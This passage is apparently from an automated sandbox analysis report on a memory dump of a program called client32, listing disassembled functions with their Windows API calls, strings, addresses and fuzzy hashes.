Instruction Fuzzy Hash: B9E0E536300129A7A7041BA6AD449AEBB6CDFC4D6E7110032FD28C3E00DF30D80286B1

Uniqueness

Uniqueness Score: -1.00%

Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 11017428
GetWindowLongA.USER32 ref: 11017437
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B

Strings

IPTip_Main_Window, xrefs: 11017423

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698

Uniqueness

Uniqueness Score: -1.00%

Function 111667E5 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 11166840
_memcpy_s.LIBCMT ref: 111668B1
__read.LIBCMT ref: 11166914
__filbuf.LIBCMT ref: 11166930

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

_memset.LIBCMT ref: 11166971

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: d9f32e46d9129f6871fdf0146983855cb3a33090916eea666530e2cf9bb832c2
Instruction ID: f024df4859c145f8674fbc926a5d64ff24aa23ab54538f0797afc31cd8f93c65
Opcode Fuzzy Hash: d9f32e46d9129f6871fdf0146983855cb3a33090916eea666530e2cf9bb832c2
Instruction Fuzzy Hash: 5351A875E00306DFDB108F79C94469DFBBDEF40364F118A29E86496190E7F29A74CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1111B5D0 Relevance: 7.6, APIs: 5, Instructions: 116windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000000), ref: 1111B613

Part of subcall function 11113D20: _memmove.LIBCMT ref: 11113D83

BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B677
BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B69F
BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6CD
BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6F1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ObjectStock_memmove
String ID:
API String ID: 2979131814-0
Opcode ID: dbca20f1f5f7623a4ab8e673b8f0406da72958bd17ed11048a27d3daf01fbb7b
Instruction ID: 92b8e22ea7e4688bb1be41d709802a1928e2f32718a1b5f8dbc669fb6f1dc32a
Opcode Fuzzy Hash: dbca20f1f5f7623a4ab8e673b8f0406da72958bd17ed11048a27d3daf01fbb7b
Instruction Fuzzy Hash: 554195B5A11219BFDB04CAA8D985EAFF7BDFB8C614F104229F915A3244D670BD008BB4

Uniqueness

Uniqueness Score: -1.00%

Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,0CBC1010,?,?,?,0CBC1010), ref: 110CEE2A
Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000,?,?,?,0CBC1010), ref: 110CEE92

IsWindow.USER32(?), ref: 110CF82B

Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339

RemovePropA.USER32 ref: 110CF858
DeleteObject.GDI32(?), ref: 110CF86C
DeleteObject.GDI32(?), ref: 110CF876
DeleteObject.GDI32(?), ref: 110CF880

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 1921910413-0
Opcode ID: 9eebe54c98b848111fc2ee340d6e07afed2adb92d9e37135a46ceadea0f5dd96
Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
Opcode Fuzzy Hash: 9eebe54c98b848111fc2ee340d6e07afed2adb92d9e37135a46ceadea0f5dd96
Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11081616
wsprintfA.USER32 ref: 1108164D

Strings

..\CTL32\DataStream.cpp, xrefs: 1108165E
%02x, xrefs: 11081610
m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
API String ID: 2111968516-476189988
Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6

SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
DeleteObject.GDI32(?), ref: 1111F4E4
DeleteObject.GDI32(?), ref: 1111F4F1
DeleteObject.GDI32(?), ref: 1111F516

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteObject$PaletteSelect
String ID:
API String ID: 2820294704-0
Opcode ID: 3f522e6c8faa98df4d8825fdb436005541d0870e914f9d973299dc4dd91eea3f
Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
Opcode Fuzzy Hash: 3f522e6c8faa98df4d8825fdb436005541d0870e914f9d973299dc4dd91eea3f
Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1

Uniqueness

Uniqueness Score: -1.00%

Function 111203A0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

CreateFontIndirectA.GDI32(?), ref: 111203B7
SelectObject.GDI32(?,00000000), ref: 111203C5
DeleteObject.GDI32(00000000), ref: 111203DD
DestroyCaret.USER32 ref: 11120427
GetTextMetricsA.GDI32(?,?), ref: 1112043A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$CaretCreateDeleteDestroyFontIndirectMetricsSelectText
String ID:
API String ID: 3157017215-0
Opcode ID: 9616a6df07214044c73fe254ae911cd33ae5b13f194545ba98b85c84a9e919cd
Instruction ID: 8dff65c09a1557b696c85e9e25c6311fcf634728ba3d8a527a514e8d98d4d363
Opcode Fuzzy Hash: 9616a6df07214044c73fe254ae911cd33ae5b13f194545ba98b85c84a9e919cd
Instruction Fuzzy Hash: EE31F4709047949FC319CF74D1947AAFFE9EF49309F54856EE4AE8A281DB35A542CB00

Uniqueness

Uniqueness Score: -1.00%

Function 1100A250 Relevance: 7.5, APIs: 5, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
DeviceIoControl.KERNEL32 ref: 1100A298
GetLastError.KERNEL32 ref: 1100A2A0
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
CloseHandle.KERNEL32(00000000), ref: 1100A2BB

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceErrorEventHandleLastObjectSingleWait
String ID:
API String ID: 2062450601-0
Opcode ID: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
Instruction ID: bc93eed9d268af17b12dc0c75b84aef517d95988fbcc1729b49ee65d4685203d
Opcode Fuzzy Hash: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
Instruction Fuzzy Hash: F601F731A40629B7F7159AA8CC45F9DB768AB44775F204320F934A76C0C770A94187D4

Uniqueness

Uniqueness Score: -1.00%

Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 11171312

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__getptd.LIBCMT ref: 11171329
__amsg_exit.LIBCMT ref: 11171337
__lock.LIBCMT ref: 11171347
__updatetlocinfoEx_nolock.LIBCMT ref: 1117135B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 11012090 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 11012239

Strings

%, xrefs: 110121CB
$, xrefs: 110120E7
+, xrefs: 110121D7

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
Instruction ID: 709c54241741de87a29271ffeb556a2f401356d1bb5d83c5dcf625fd940d7789
Opcode Fuzzy Hash: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
Instruction Fuzzy Hash: 6C515EF6E002499ADB16CE58C8847CE7BF5FB15304F3085C5ED44AB29AEA3DC994CB90

Uniqueness

Uniqueness Score: -1.00%

Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 110D1378

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D12F7, 110D132A, 110D139E
IsA(), xrefs: 110D12FC, 110D13A3
cchLen<=0 || cchLen<=(int) _tcslen(pszStr), xrefs: 110D132F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
API String ID: 1528188558-323366856
Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398

Uniqueness

Uniqueness Score: -1.00%

Function 110AA7C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 110AA828

Strings

m_hWnd, xrefs: 110AA83F
SysListView32, xrefs: 110AA822
..\ctl32\listview.cpp, xrefs: 110AA83A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
API String ID: 716092398-3171529584
Opcode ID: 26a32833975e99b8172e0f8059736a3867dcaecb9c6cc9a2dc8fb3f4eff27dcb
Instruction ID: 233598042db77364abfde988217b88f03a1ef401ddb8a0e60fc0a2cc0ff0e3e6
